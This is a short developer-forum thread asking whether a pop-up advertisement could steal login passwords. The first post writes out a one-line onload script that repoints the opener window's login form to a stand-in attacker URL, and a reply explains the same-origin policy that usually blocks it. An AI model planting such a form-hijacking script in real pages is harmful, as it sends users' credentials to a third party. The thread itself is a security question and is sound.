470,594 Members | 1,412 Online
Bytes | Developer Community
New Post

Home Posts Topics Members FAQ

Post your question to a community of 470,594 developers. It's quick & easy.

form action password sniffing?

Security hole for dummies:

Let's say I have a login screen with a lots of advertisement (links).
One of those links is opened in a new window, and there is the following:

<body
onload="opener.document.forms[0].action='http://www.hackerz.com/PasswordDatabase.php';">

After clicking the link and reading the advertisement, I go on "logging
in" on the first window. After I submit, the form data, username,
password and all is submitted to a third party..
Is this old news? (I don't follow these news too often..) Any comments,
fixes, anything?
Jul 20 '05 #1
2 1398

Hi,

my 2 cents:

In the case you describe the popstuff is probably hosted somewhere else, via
some advertising company (hate them).
I think all modern browsers don't allow javascript doing anything on a
window that is hosted from another server.

so: window1: html://www.serv1.com/page.htm
window2: html://www.serv2.com/page.htm

The script on window2 cannot access window1.

In that case you are safe.

If however both are hosted from the same server, your trick will work.
Just another good reason not to fill your own server with scripts from some
untrusted party.

Regards,
Erwin Moller

Jul 20 '05 #2
> I think all modern browsers don't allow javascript doing anything on a
window that is hosted from another server.
Ok, that helps.. I had only one host to test it on.
If however both are hosted from the same server, your trick will work.


A good reason not to use any domains offering free web pages under the
same hostname.. I wonder if there are any abuses using this trick?

Thanks for replying!
Jul 20 '05 #3

This discussion thread is closed

Replies have been disabled for this discussion.

Similar topics

6 posts views Thread by tencip | last post: by
36 posts views Thread by dcrespo | last post: by
5 posts views Thread by Navillus | last post: by
5 posts views Thread by Olly | last post: by
1 post views Thread by Denis | last post: by
2 posts views Thread by Grey Alien | last post: by
By using this site, you agree to our Privacy Policy and Terms of Use.